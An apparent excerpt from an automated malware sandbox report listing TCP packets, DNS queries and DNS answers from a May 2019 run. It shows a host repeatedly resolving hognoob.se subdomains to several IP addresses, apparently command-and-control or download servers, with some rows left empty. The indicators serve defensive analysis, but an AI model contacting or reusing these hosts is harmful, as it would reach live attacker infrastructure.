May 16, 2019 17:15:39.335333109 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335356951 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335393906 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.335417032 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335433006 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335448027 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335474968 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335489988 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335505962 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335535049 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335570097 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.335597038 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335612059 CEST 80 49797 45.67.14.164 192.168.2.5


May 16, 2019 17:15:39.335627079 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335640907 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335655928 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335690022 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.335712910 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335728884 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335742950 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335757971 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335772991 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335802078 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.335834980 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335850000 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335863113 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335876942 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335891962 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335920095 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.335956097 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335971117 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335985899 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.335999966 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.336013079 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.336036921 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.336071968 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.336086988 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.336102009 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.336457014 CEST 49797 80 192.168.2.5 45.67.14.164

May 16, 2019 17:15:39.346796036 CEST 9456 49798 23.106.122.2 192.168.2.5

May 16, 2019 17:15:39.382832050 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.382937908 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.382958889 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.382980108 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.382998943 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.383064985 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.383124113 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.383143902 CEST 80 49797 45.67.14.164 192.168.2.5

May 16, 2019 17:15:39.383162975 CEST 80 49797 45.67.14.164 192.168.2.5



May 16, 2019 17:15:39.070086956 CEST 58937 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:39.110205889 CEST 53 58937 8.8.8.8 192.168.2.5

May 16, 2019 17:15:39.144161940 CEST 62548 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:39.171838999 CEST 53 62548 8.8.8.8 192.168.2.5

May 16, 2019 17:15:40.738154888 CEST 53311 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:40.765496016 CEST 53 53311 8.8.8.8 192.168.2.5

May 16, 2019 17:15:42.426970959 CEST 54455 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:42.460274935 CEST 53 54455 8.8.8.8 192.168.2.5

May 16, 2019 17:15:44.085347891 CEST 54772 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:44.124200106 CEST 53 54772 8.8.8.8 192.168.2.5

May 16, 2019 17:15:44.132404089 CEST 58460 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:44.177515984 CEST 53 58460 8.8.8.8 192.168.2.5

May 16, 2019 17:15:45.823421955 CEST 58876 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:45.850907087 CEST 53 58876 8.8.8.8 192.168.2.5

May 16, 2019 17:15:46.941581011 CEST 58501 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:47.003392935 CEST 53 58501 8.8.8.8 192.168.2.5

May 16, 2019 17:15:47.482274055 CEST 53388 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:47.510266066 CEST 53 53388 8.8.8.8 192.168.2.5

May 16, 2019 17:15:50.849494934 CEST 58724 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:50.876676083 CEST 53 58724 8.8.8.8 192.168.2.5

May 16, 2019 17:15:52.489936113 CEST 60822 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:52.517611027 CEST 53 60822 8.8.8.8 192.168.2.5

May 16, 2019 17:15:53.103890896 CEST 58429 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:53.131223917 CEST 53 58429 8.8.8.8 192.168.2.5

UDP Packets


May 16, 2019 17:15:53.375061035 CEST 55467 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:53.403254986 CEST 53 55467 8.8.8.8 192.168.2.5

May 16, 2019 17:15:53.576452971 CEST 52386 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:53.603751898 CEST 53 52386 8.8.8.8 192.168.2.5

May 16, 2019 17:15:54.214173079 CEST 64452 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:54.274655104 CEST 53 64452 8.8.8.8 192.168.2.5

May 16, 2019 17:15:55.937410116 CEST 57162 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:55.964837074 CEST 53 57162 8.8.8.8 192.168.2.5

May 16, 2019 17:15:57.639635086 CEST 63777 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:57.666914940 CEST 53 63777 8.8.8.8 192.168.2.5

May 16, 2019 17:15:59.347651005 CEST 52431 53 192.168.2.5 8.8.8.8

May 16, 2019 17:15:59.374690056 CEST 53 52431 8.8.8.8 192.168.2.5

May 16, 2019 17:16:01.130189896 CEST 62217 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:01.157440901 CEST 53 62217 8.8.8.8 192.168.2.5

May 16, 2019 17:16:02.812659025 CEST 57684 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:02.839837074 CEST 53 57684 8.8.8.8 192.168.2.5

May 16, 2019 17:16:04.547229052 CEST 52990 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:04.574561119 CEST 53 52990 8.8.8.8 192.168.2.5

May 16, 2019 17:16:06.240150928 CEST 49515 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:06.274620056 CEST 53 49515 8.8.8.8 192.168.2.5

May 16, 2019 17:16:08.306943893 CEST 61794 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:08.335238934 CEST 53 61794 8.8.8.8 192.168.2.5

May 16, 2019 17:16:12.969938040 CEST 58256 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:13.009057045 CEST 53 58256 8.8.8.8 192.168.2.5

May 16, 2019 17:16:14.651127100 CEST 59078 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:14.664491892 CEST 53 59078 8.8.8.8 192.168.2.5

May 16, 2019 17:16:21.065387964 CEST 53453 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:21.092657089 CEST 53 53453 8.8.8.8 192.168.2.5

May 16, 2019 17:16:22.791235924 CEST 56313 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:22.818922043 CEST 53 56313 8.8.8.8 192.168.2.5

May 16, 2019 17:16:24.500495911 CEST 50140 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:24.528129101 CEST 53 50140 8.8.8.8 192.168.2.5

May 16, 2019 17:16:26.195426941 CEST 63107 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:26.223279953 CEST 53 63107 8.8.8.8 192.168.2.5

May 16, 2019 17:16:31.800149918 CEST 60885 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:31.827606916 CEST 53 60885 8.8.8.8 192.168.2.5

May 16, 2019 17:16:33.498259068 CEST 51827 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:33.529900074 CEST 53 51827 8.8.8.8 192.168.2.5

May 16, 2019 17:16:35.433422089 CEST 54050 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:35.461162090 CEST 53 54050 8.8.8.8 192.168.2.5

May 16, 2019 17:16:37.098253012 CEST 50611 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:37.125576019 CEST 53 50611 8.8.8.8 192.168.2.5

May 16, 2019 17:16:38.811672926 CEST 62388 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:38.825573921 CEST 53 62388 8.8.8.8 192.168.2.5

May 16, 2019 17:16:40.479717970 CEST 59412 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:40.507721901 CEST 53 59412 8.8.8.8 192.168.2.5

May 16, 2019 17:16:42.138859034 CEST 50860 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:42.166168928 CEST 53 50860 8.8.8.8 192.168.2.5

May 16, 2019 17:16:43.855046988 CEST 57540 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:43.885386944 CEST 53 57540 8.8.8.8 192.168.2.5

May 16, 2019 17:16:45.574423075 CEST 50779 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:45.601716042 CEST 53 50779 8.8.8.8 192.168.2.5

May 16, 2019 17:16:47.304636002 CEST 51380 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:47.331859112 CEST 53 51380 8.8.8.8 192.168.2.5

May 16, 2019 17:16:48.977777004 CEST 60707 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:48.991177082 CEST 53 60707 8.8.8.8 192.168.2.5

May 16, 2019 17:16:50.642930031 CEST 49386 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:50.674896002 CEST 53 49386 8.8.8.8 192.168.2.5

May 16, 2019 17:16:54.067745924 CEST 64896 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:54.095082998 CEST 53 64896 8.8.8.8 192.168.2.5

May 16, 2019 17:16:55.747817039 CEST 55090 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:55.761073112 CEST 53 55090 8.8.8.8 192.168.2.5

May 16, 2019 17:16:57.391441107 CEST 49816 53 192.168.2.5 8.8.8.8

May 16, 2019 17:16:57.418710947 CEST 53 49816 8.8.8.8 192.168.2.5



May 16, 2019 17:17:01.390713930 CEST 51260 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:01.417872906 CEST 53 51260 8.8.8.8 192.168.2.5

May 16, 2019 17:17:03.132452011 CEST 59500 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:03.145778894 CEST 53 59500 8.8.8.8 192.168.2.5

May 16, 2019 17:17:04.779526949 CEST 53889 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:04.793451071 CEST 53 53889 8.8.8.8 192.168.2.5

May 16, 2019 17:17:06.519885063 CEST 57689 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:06.533390999 CEST 53 57689 8.8.8.8 192.168.2.5

May 16, 2019 17:17:08.173060894 CEST 63557 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:08.200413942 CEST 53 63557 8.8.8.8 192.168.2.5

May 16, 2019 17:17:09.854626894 CEST 63582 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:09.887250900 CEST 53 63582 8.8.8.8 192.168.2.5

May 16, 2019 17:17:11.532763004 CEST 59287 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:11.546127081 CEST 53 59287 8.8.8.8 192.168.2.5

May 16, 2019 17:17:13.209136009 CEST 57502 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:13.222455025 CEST 53 57502 8.8.8.8 192.168.2.5

May 16, 2019 17:17:19.505327940 CEST 57600 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:19.532576084 CEST 53 57600 8.8.8.8 192.168.2.5

May 16, 2019 17:17:21.178663969 CEST 57426 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:21.206109047 CEST 53 57426 8.8.8.8 192.168.2.5

May 16, 2019 17:17:22.856798887 CEST 53451 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:22.870672941 CEST 53 53451 8.8.8.8 192.168.2.5

May 16, 2019 17:17:24.610611916 CEST 65030 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:24.638256073 CEST 53 65030 8.8.8.8 192.168.2.5

May 16, 2019 17:17:26.340679884 CEST 63505 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:26.354038954 CEST 53 63505 8.8.8.8 192.168.2.5

May 16, 2019 17:17:28.003288031 CEST 58579 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:28.016495943 CEST 53 58579 8.8.8.8 192.168.2.5

May 16, 2019 17:17:29.764863014 CEST 65402 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:29.792603016 CEST 53 65402 8.8.8.8 192.168.2.5

May 16, 2019 17:17:31.552505016 CEST 59046 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:31.565807104 CEST 53 59046 8.8.8.8 192.168.2.5

May 16, 2019 17:17:33.191221952 CEST 53154 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:33.221442938 CEST 53 53154 8.8.8.8 192.168.2.5

May 16, 2019 17:17:34.902124882 CEST 52283 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:34.915518999 CEST 53 52283 8.8.8.8 192.168.2.5

May 16, 2019 17:17:36.536287069 CEST 58992 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:36.564078093 CEST 53 58992 8.8.8.8 192.168.2.5

May 16, 2019 17:17:38.200508118 CEST 49985 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:38.228178024 CEST 53 49985 8.8.8.8 192.168.2.5

May 16, 2019 17:17:39.910947084 CEST 56529 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:39.924240112 CEST 53 56529 8.8.8.8 192.168.2.5

May 16, 2019 17:17:41.071813107 CEST 65334 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:41.518049955 CEST 53 65334 8.8.8.8 192.168.2.5

May 16, 2019 17:17:43.792778969 CEST 57365 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:43.828746080 CEST 53 57365 8.8.8.8 192.168.2.5

May 16, 2019 17:17:45.147485971 CEST 60056 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:45.178095102 CEST 53 60056 8.8.8.8 192.168.2.5

May 16, 2019 17:17:46.615647078 CEST 52221 53 192.168.2.5 8.8.8.8

May 16, 2019 17:17:46.642884970 CEST 53 52221 8.8.8.8 192.168.2.5

May 16, 2019 17:18:06.509629965 CEST 58454 53 192.168.2.5 8.8.8.8

May 16, 2019 17:18:06.555711985 CEST 53 58454 8.8.8.8 192.168.2.5

May 16, 2019 17:18:08.981101036 CEST 51879 53 192.168.2.5 8.8.8.8

May 16, 2019 17:18:08.994851112 CEST 53 51879 8.8.8.8 192.168.2.5

May 16, 2019 17:18:11.523444891 CEST 57390 53 192.168.2.5 8.8.8.8

May 16, 2019 17:18:11.550880909 CEST 53 57390 8.8.8.8 192.168.2.5

May 16, 2019 17:18:14.228220940 CEST 52974 53 192.168.2.5 8.8.8.8

May 16, 2019 17:18:14.258923054 CEST 53 52974 8.8.8.8 192.168.2.5


Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

May 16, 2019 17:15:39.070086956 CEST 192.168.2.5 8.8.8.8 0xebbe Standard query (0)

fid.hognoob.se A (IP address) IN (0x0001)

DNS Queries


May 16, 2019 17:15:39.144161940 CEST 192.168.2.5 8.8.8.8 0xe889 Standard query (0)

q1a.hognoob.se A (IP address) IN (0x0001)

May 16, 2019 17:15:40.738154888 CEST 192.168.2.5 8.8.8.8 0x7de4 Standard query (0)


May 16, 2019 17:15:42.426970959 CEST 192.168.2.5 8.8.8.8 0xe1ee Standard query (0)


May 16, 2019 17:15:44.085347891 CEST 192.168.2.5 8.8.8.8 0x792 Standard query (0)


May 16, 2019 17:15:44.132404089 CEST 192.168.2.5 8.8.8.8 0xed86 Standard query (0)






May 16, 2019 17:15:47.482274055 CEST 192.168.2.5 8.8.8.8 0x2a2 Standard query (0)




May 16, 2019 17:15:52.489936113 CEST 192.168.2.5 8.8.8.8 0xc58f Standard query (0)


May 16, 2019 17:15:53.103890896 CEST 192.168.2.5 8.8.8.8 0xfacb Standard query (0)

uio.hognoob.se A (IP address) IN (0x0001)

May 16, 2019 17:15:53.375061035 CEST 192.168.2.5 8.8.8.8 0xbb7d Standard query (0)

upa1.hognoob.se A (IP address) IN (0x0001)

May 16, 2019 17:15:53.576452971 CEST 192.168.2.5 8.8.8.8 0xbb56 Standard query (0)

upa2.hognoob.se A (IP address) IN (0x0001)



May 16, 2019 17:15:55.937410116 CEST 192.168.2.5 8.8.8.8 0x77e8 Standard query (0)


May 16, 2019 17:15:57.639635086 CEST 192.168.2.5 8.8.8.8 0x4ab3 Standard query (0)






May 16, 2019 17:16:02.812659025 CEST 192.168.2.5 8.8.8.8 0xdfc6 Standard query (0)


May 16, 2019 17:16:04.547229052 CEST 192.168.2.5 8.8.8.8 0xacce Standard query (0)


May 16, 2019 17:16:06.240150928 CEST 192.168.2.5 8.8.8.8 0x4b08 Standard query (0)


May 16, 2019 17:16:08.306943893 CEST 192.168.2.5 8.8.8.8 0xfd76 Standard query (0)


May 16, 2019 17:16:12.969938040 CEST 192.168.2.5 8.8.8.8 0xa3d4 Standard query (0)


May 16, 2019 17:16:14.651127100 CEST 192.168.2.5 8.8.8.8 0x320c Standard query (0)


May 16, 2019 17:16:21.065387964 CEST 192.168.2.5 8.8.8.8 0x82d8 Standard query (0)


May 16, 2019 17:16:22.791235924 CEST 192.168.2.5 8.8.8.8 0xe8bb Standard query (0)




May 16, 2019 17:16:26.195426941 CEST 192.168.2.5 8.8.8.8 0x4f04 Standard query (0)


May 16, 2019 17:16:31.800149918 CEST 192.168.2.5 8.8.8.8 0x546a Standard query (0)




May 16, 2019 17:16:35.433422089 CEST 192.168.2.5 8.8.8.8 0xdab1 Standard query (0)


May 16, 2019 17:16:37.098253012 CEST 192.168.2.5 8.8.8.8 0x4b17 Standard query (0)






May 16, 2019 17:16:42.138859034 CEST 192.168.2.5 8.8.8.8 0x730c Standard query (0)


May 16, 2019 17:16:43.855046988 CEST 192.168.2.5 8.8.8.8 0x76de Standard query (0)


May 16, 2019 17:16:45.574423075 CEST 192.168.2.5 8.8.8.8 0xa505 Standard query (0)




May 16, 2019 17:16:47.304636002 CEST 192.168.2.5 8.8.8.8 0x370f Standard query (0)








May 16, 2019 17:16:55.747817039 CEST 192.168.2.5 8.8.8.8 0x7ec4 Standard query (0)




May 16, 2019 17:17:01.390713930 CEST 192.168.2.5 8.8.8.8 0x9cc8 Standard query (0)


May 16, 2019 17:17:03.132452011 CEST 192.168.2.5 8.8.8.8 0xed52 Standard query (0)


May 16, 2019 17:17:04.779526949 CEST 192.168.2.5 8.8.8.8 0xaf13 Standard query (0)


May 16, 2019 17:17:06.519885063 CEST 192.168.2.5 8.8.8.8 0xbcc5 Standard query (0)


May 16, 2019 17:17:08.173060894 CEST 192.168.2.5 8.8.8.8 0xa24b Standard query (0)


May 16, 2019 17:17:09.854626894 CEST 192.168.2.5 8.8.8.8 0x66b Standard query (0)




May 16, 2019 17:17:13.209136009 CEST 192.168.2.5 8.8.8.8 0x8f5c Standard query (0)


May 16, 2019 17:17:19.505327940 CEST 192.168.2.5 8.8.8.8 0x73df Standard query (0)


May 16, 2019 17:17:21.178663969 CEST 192.168.2.5 8.8.8.8 0xa074 Standard query (0)


May 16, 2019 17:17:22.856798887 CEST 192.168.2.5 8.8.8.8 0xe699 Standard query (0)




May 16, 2019 17:17:26.340679884 CEST 192.168.2.5 8.8.8.8 0xba0b Standard query (0)


May 16, 2019 17:17:28.003288031 CEST 192.168.2.5 8.8.8.8 0x36a9 Standard query (0)


May 16, 2019 17:17:29.764863014 CEST 192.168.2.5 8.8.8.8 0xde13 Standard query (0)






May 16, 2019 17:17:34.902124882 CEST 192.168.2.5 8.8.8.8 0xcf8d Standard query (0)






May 16, 2019 17:17:39.910947084 CEST 192.168.2.5 8.8.8.8 0xe5a7 Standard query (0)


May 16, 2019 17:17:41.071813107 CEST 192.168.2.5 8.8.8.8 0xb48f Standard query (0)

2019.ip138.com A (IP address) IN (0x0001)

May 16, 2019 17:17:43.792778969 CEST 192.168.2.5 8.8.8.8 0xb46d Standard query (0)

pxx.hognoob.se A (IP address) IN (0x0001)


haq.hognoob.se A (IP address) IN (0x0001)

May 16, 2019 17:17:46.615647078 CEST 192.168.2.5 8.8.8.8 0x2ca7 Standard query (0)




May 16, 2019 17:18:08.981101036 CEST 192.168.2.5 8.8.8.8 0xddac Standard query (0)


May 16, 2019 17:18:11.523444891 CEST 192.168.2.5 8.8.8.8 0xffac Standard query (0)


May 16, 2019 17:18:14.228220940 CEST 192.168.2.5 8.8.8.8 0x612a Standard query (0)



DNS Answers


Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

May 16, 2019 17:15:39.110205889 CEST

8.8.8.8 192.168.2.5 0xebbe No error (0) fid.hognoob.se 45.67.14.164 A (IP address) IN (0x0001)

May 16, 2019 17:15:39.171838999 CEST

8.8.8.8 192.168.2.5 0xe889 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:15:40.765496016 CEST

8.8.8.8 192.168.2.5 0x7de4 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:15:42.460274935 CEST

8.8.8.8 192.168.2.5 0xe1ee No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:15:44.124200106 CEST

8.8.8.8 192.168.2.5 0x792 No error (0) fid.hognoob.se 45.67.14.164 A (IP address) IN (0x0001)

May 16, 2019 17:15:44.177515984 CEST

8.8.8.8 192.168.2.5 0xed86 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:15:45.850907087 CEST

8.8.8.8 192.168.2.5 0x3368 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:15:47.003392935 CEST

8.8.8.8 192.168.2.5 0x1922 No error (0) fid.hognoob.se 45.67.14.164 A (IP address) IN (0x0001)

May 16, 2019 17:15:47.510266066 CEST

8.8.8.8 192.168.2.5 0x2a2 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:15:50.876676083 CEST


May 16, 2019 17:15:52.517611027 CEST

8.8.8.8 192.168.2.5 0xc58f No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:15:53.131223917 CEST

8.8.8.8 192.168.2.5 0xfacb No error (0) uio.hognoob.se 195.128.126.120 A (IP address) IN (0x0001)

May 16, 2019 17:15:53.403254986 CEST

8.8.8.8 192.168.2.5 0xbb7d No error (0) upa1.hognoob.se 172.104.161.101 A (IP address) IN (0x0001)

May 16, 2019 17:15:53.603751898 CEST

8.8.8.8 192.168.2.5 0xbb56 No error (0) upa2.hognoob.se 172.105.237.113 A (IP address) IN (0x0001)

May 16, 2019 17:15:54.274655104 CEST


May 16, 2019 17:15:55.964837074 CEST

8.8.8.8 192.168.2.5 0x77e8 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:15:57.666914940 CEST

8.8.8.8 192.168.2.5 0x4ab3 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:15:59.374690056 CEST


May 16, 2019 17:16:01.157440901 CEST


May 16, 2019 17:16:02.839837074 CEST

8.8.8.8 192.168.2.5 0xdfc6 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:04.574561119 CEST

8.8.8.8 192.168.2.5 0xacce No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:06.274620056 CEST

8.8.8.8 192.168.2.5 0x4b08 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:08.335238934 CEST

8.8.8.8 192.168.2.5 0xfd76 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:13.009057045 CEST

8.8.8.8 192.168.2.5 0xa3d4 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:14.664491892 CEST

8.8.8.8 192.168.2.5 0x320c No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:21.092657089 CEST

8.8.8.8 192.168.2.5 0x82d8 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)


May 16, 2019 17:16:22.818922043 CEST

8.8.8.8 192.168.2.5 0xe8bb No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:24.528129101 CEST


May 16, 2019 17:16:26.223279953 CEST

8.8.8.8 192.168.2.5 0x4f04 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:31.827606916 CEST

8.8.8.8 192.168.2.5 0x546a No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:33.529900074 CEST


May 16, 2019 17:16:35.461162090 CEST

8.8.8.8 192.168.2.5 0xdab1 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:37.125576019 CEST

8.8.8.8 192.168.2.5 0x4b17 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:38.825573921 CEST


May 16, 2019 17:16:40.507721901 CEST


May 16, 2019 17:16:42.166168928 CEST

8.8.8.8 192.168.2.5 0x730c No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:43.885386944 CEST

8.8.8.8 192.168.2.5 0x76de No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:45.601716042 CEST

8.8.8.8 192.168.2.5 0xa505 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:47.331859112 CEST

8.8.8.8 192.168.2.5 0x370f No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:48.991177082 CEST


May 16, 2019 17:16:50.674896002 CEST


May 16, 2019 17:16:54.095082998 CEST


May 16, 2019 17:16:55.761073112 CEST

8.8.8.8 192.168.2.5 0x7ec4 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:16:57.418710947 CEST


May 16, 2019 17:17:01.417872906 CEST

8.8.8.8 192.168.2.5 0x9cc8 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:03.145778894 CEST

8.8.8.8 192.168.2.5 0xed52 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:04.793451071 CEST

8.8.8.8 192.168.2.5 0xaf13 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:06.533390999 CEST

8.8.8.8 192.168.2.5 0xbcc5 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:08.200413942 CEST

8.8.8.8 192.168.2.5 0xa24b No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:09.887250900 CEST

8.8.8.8 192.168.2.5 0x66b No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:11.546127081 CEST


May 16, 2019 17:17:13.222455025 CEST

8.8.8.8 192.168.2.5 0x8f5c No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)



May 16, 2019 17:17:19.532576084 CEST

8.8.8.8 192.168.2.5 0x73df No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:21.206109047 CEST

8.8.8.8 192.168.2.5 0xa074 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:22.870672941 CEST

